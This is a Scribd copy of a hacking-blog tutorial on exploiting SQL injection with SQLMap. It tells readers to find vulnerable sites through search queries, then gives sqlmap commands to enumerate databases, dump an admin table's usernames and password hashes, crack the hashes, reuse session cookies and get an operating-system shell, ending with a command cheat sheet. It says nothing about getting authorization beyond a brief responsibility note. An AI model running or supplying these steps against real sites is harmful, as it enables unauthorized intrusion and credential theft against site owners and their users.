Scribd
Upload
177 views

Advertise Contact Us: Home Tutorials CTF Challenges Q&A Sitemap Contact Us

Uploaded by

cesar augusto palacio echeverri
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
177 views

Advertise Contact Us: Home Tutorials CTF Challenges Q&A Sitemap Contact Us

Uploaded by

cesar augusto palacio echeverri
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 20

 Friday, October 11, 2019 Advertise Contact us     

 Home Tutorials  CTF Challenges Q&A  Sitemap Contact Us 

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Search … Search

RECENT ARTICLES

 Must Buy Python Books Collection –

2019 Update

 Firefox Lockwise: Secured Password

Manager for iOS and Android

 Top 10 Dangerous Viruses of all times

 Top 50 Hacking and Penetration Testing

Tools [Compiled List 2019]

 [Penetration Testing] Top 70 Most

Interview Questions

 [Metasploit] Upgrading Normal

Command Shell to Meterpreter Shell


TUTORIALS

Live SQL Injection Exploitation With SQLMap – A Detailed  Top 25 Reddits – SubReddits

Guide Communities [Information Security]

 September 11, 2017  H4ck0  Comment(0)  List of 100+ Cyber Security RSS Feeds

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Hello geeks, today we’ll show you some basic SQL Injection techniques with the help of Python and  Top 25 Keyword Research Tools [Search
SQLMap. Engine Optimization]

SQL injection is one of the most critical vulnerabilities till now and is still included in the OWASP Top 10  Limit the Internet Speed of LAN Users

list’s Injection flaws section. Sqlmap is one of the most popular automated SQL Injection exploitation tool [Evil Limiter]
which can work on both Linux and Windows platforms.

In Kali Linux, Sqlmap is pre-installed but for Windows, you can easily install Sqlmap using Python
Interpreter. There are two series of python, 2.7.x and 3.3.x. Sqlmap should run fine with both versions,
so you can choose any version.

Usage of Sqlmap in Windows:

C:\sqlmap>python ./sqlmap.py -u “Enter URL Here” –dbs

Usage of Sqlmap in Linux:

python sqlmap.py -u “Enter URL Here” –dbs

SQLMap supports exploitation of wide range of the DBMS, the list includes following names: MySQL,
IBM DB2, Oracle, Postgresql, SQLite, Firebird, Microsoft SQL Server, Microsoft Access, Sybase, SAP
MaxDB.

Once you have everything configured it’s time to start injecting. You will first need to find an SQL
vulnerable site.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Basic flow of SQLMap is as follows:
Enumerate database information such as name, version, other details,

Select a particular database to enumerate tables,

Select tables and enumerate columns,

Select columns and enumerate rows to extract data,

Further exploitation if required.

Lets say there is a web application or website that has a URL in it like this
“http://www.example.com/news.php?id=11“.

To find vulnerable sites, navigate to your favorite browser and try searching for terms like “php?id=“,
“login.php?id=“, “index.php?id=” etc.

Once you found a site you can test it to see if it’s vulnerable by adding an apostrophe (‘) after the link. So
the new URL will be “http://www.example.com/news.php?id=11‘”.

If the above URL throws an error or reacts in an unexpected manner then it is clear that the database has
got the unexpected single quote which the application did not escape properly. So in this case this input
parameter “id” is vulnerable to SQL injection.

This is the error message which it shows:


“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version
for the right syntax to use near ‘\” at line 1″.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Now its time for live exploitation and we’ll use Kali Linux in this case where your Sqlmap is already pre-
installed in it.

Command: python sqlmap.py -u “http://www.example.com/news.php?id=11” –dbs

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Here,

-u defines the Target URL.

–dbs will attempt to pull up the website databases and if you simply want to check whether the site is
vulnerable to SQL Injection or not then you can simply neglect the (–dbs) parameter.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
So with the help of SQLMap, you can easily discover the OS name, web server and database along with
version information.

As you can see above, the website in which we’re attacking has two databases (db363851433, and
information_schema). Now its time to find out what tables exist in a particular database. Lets say the
database of interest over here is ‘db363851433‘.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Syntax: sqlmap -u “Your Target URL” -D (choose a database) –tables

Command: sqlmap -u “http://www.example.com/news.php?id=11” -D db363851433 –tables

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
The -D command will specify a specific database to search. Once again notice the double hyphen in –
tables. This will output the tables in the database to the screen.

Now that we have the list of tables with us, it would be a good idea to get the columns of some
important table. Lets say the table is ‘admin_user‘ and it contains the username and password.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
To search one of the tables type the following command:

Syntax: sqlmap.py -u “Your Target URL” -D (the database you chose) -T (choose a table) –columns

The -T command specifies the table to search, while the double hyphen in –columns prints the columns
on the screen. We decided to search the admin_user table and was presented with the below command.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Command: sqlmap -u “http://www.example.com/news.php?id=11” -D db363851433 -T admin_user –
columns

So now the columns are clearly visible. Now comes the most interesting part, of extracting the data from
the table. In the columns list notice admin_user_name and admin_pass. These are the two columns
which we really need to dump. The command would be:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Syntax: sqlmap -u “Your Target URL” -D (the database you chose) -T (the table you chose) -C (choose a
column) –dump

Command: sqlmap -u “http://www.example.com/news.php?id=11” -D db363851433 -T admin_user -C


admin_user_name,admin_pass –dump

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
And if you want to dump all data from a particular column, then the command would be:

Command: sqlmap -u “http://www.example.com/news.php?id=11” -D db363851433 -T admin_user –


dump

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
The hash column seems to have the password hash. Try cracking the hash and then you would get the
login details right away. Sqlmap will also create a .csv file containing the dump data for easy and future
analysis.

Sometimes Sqlmap is unable to connect to the URL at all. This is visible when it gets stuck at the first
task of “testing connection to the target URL“. In such cases its helpful to use the “–random-agent”
option. This makes Sqlmap to use a valid user agent signature like the ones send by a browser like
Chrome or Mozilla Firefox.

For URLs that are not in the form of param=value Sqlmap cannot automatically know where to inject.

For example, some URLs are like: http://www.example.com/page/about.

In such cases Sqlmap needs to be told the injection point marked by a *

For example, some URLs are like: http://www.example.com/page*/about.

The above will tell Sqlmap to inject at the point marked by *.

When using forms that submit data through post method then Sqlmap has to be provided the post data
in the “–data” options that we’ll try to cover in next article.

For sites having SQL Injection vulnerability after the login page then we can also define all cookie
parameters in the form of –cookie=”security=low; PHPSESSID=4gfgtf45ft45ft45f4564576fgfhtyj”.

Here, –cookie stands for Session cookie to maintain access while attacking.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
In further exploitation, Let’s ask ourselves what more we can do? The answer is let’s own the operating
system with the help of “–os-shell“. Here –os-shell parameter will try to get the operating system
command shell by exploiting SQL injection.

SQLMAP Commands Cheatsheet – 


Fetch DB sqlmap -u “Your Target” –dbs

Fetch Tables sqlmap -u “Your Target” -D <Database> –tables

Fetch Columns sqlmap -u “Your Target” -D <Database> -T <Table Name> –columns

Data Dump sqlmap -u “Your Target” -D <Database> -T <Table Name> -C <Columns Names>
–dump

Particular Table Dump sqlmap -u “Your Target” -D <Database> -T <Table Name> –dump

Random Agent sqlmap -u “Your Target” –dbs –random-agent

Post Data Testing sqlmap -u “Your Target” –data=”<Dynamic Parameter Information>” –dbs

Scanning from file sqlmap -r <file.txt> –dbs

Cookie Embed sqlmap -u “Your Target” –cookie=”<Cookie Information>” –dbs

Increase Level and Risk sqlmap -u “Your Target” –dbs –risk=3 –level=5

Points to Remember:
It is important to make use of such a powerful tool responsibly and maturely.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Such a tool in a novice’s hands could create a devastating effect on the target system as well as the
enterprise.

SQLMap generates too many queries and could affect the performance of the target database if used in
wrong way.

Strange entries and changes in database schema are possible if the tool is not controlled and used
exhaustively.

For a learner in application security, it is very much advised to have thorough knowledge of SQL injection
attack and the background of the tool which is used. Because of this, the use of SQLMap on test systems
and sample applications is a must before using it on production systems.

If you don’t want to use Kali Linux or any Unix flavor then you can even use a automated SQL Injection
exploitation tool i.e. HAVIJ which is available for Windows OS only.

Have something to say about this article? Comment below or share it with us on Facebook or Twitter.

 Tagged detailed guide sql injection, detailed guide sqlmap, hacking tutorials, havij, live sql injection, sql injection exploitation

sqlmap, sql injection exploitation tutorial, sql injection github, sql injection security, sql injection vulnerability, sql injection

vulnerability kali linux, sqlmap, sqlmap and python, sqlmap command injection, sqlmap commands, sqlmap cookie parameter,

sqlmap dumping data, sqlmap exploitation, sqlmap exploitation kali linux, sqlmap installation, sqlmap kali linux, sqlmap os shell,

sqlmap post paramter, sqlmap security, sqlmap tool, sqlmap usage, sqlmap windows

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
H4ck0

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical
hacking, seo tips and tricks, malware analysis and scanning.
https://www.yeahhub.com/

WHERE SHOULD WE SEND ?

HACKING TUTORIALS & INFOSEC NEWS?


Subscribe to Our Newsletter and Get Instant Delivered to Your Email Inbox.

Enter your first name

Enter your email here

Subscribe Now

We respect your privacy and take protecting it seriously.

RELATED ARTICLES

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
TUTORIALS TUTORIALS TECH ARTICLES

OS Detection using SEToolkit – Credential Top 8 Basic Google Search


Metasploit Framework Harvester Attack [Tutorial] Dorks [Live Examples]
 July 30, 2017  H4ck0  November 4, 2017  H4ck0  June 11, 2019  H4ck0

 Participate in Bug Bo… Detect WordPress Use…

Leave a Reply
Your email address will not be published. Required fields are marked *

Comment

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
Name *

Email *

Website

Post Comment

DISCLAIMER RECENT COMMENTS LATEST ARTICLES

Yeahhub.com does not represent or endorse  N1H4R on Hack Android using Metasploit over  Must Buy Python Books Collection – 2019
the accuracy or reliability of any information’s, LAN/WAN Update
content or advertisements contained on, September 19, 2019

 Eyoel on How to Download Wistia Videos


distributed through, or linked, downloaded or  Firefox Lockwise: Secured Password Manager for
accessed from any of the services contained on without any Tool
iOS and Android
this website, nor the quality of any products, September 9, 2019

information’s or any other material


 Top 10 Dangerous Viruses of all times
displayed,purchased, or obtained by you as a September 5, 2019

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
result of an advertisement or any other  Priya Sharma on List of Free SEO Analysis  Top 50 Hacking and Penetration Testing Tools
information’s or offer in or in connection with Websites – [2019 Compilation] [Compiled List 2019]
the services herein. September 1, 2019

 harish on How to Download Wistia Videos


 [Penetration Testing] Top 70 Most Interview
without any Tool
Questions
August 25, 2019

Copyright © 2019 | Developed & Maintained by Mohali VA/PT Team


Write for us Advertise Privacy Policy Terms of use Cookie Policy Disclaimer Report a bug

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD

You might also like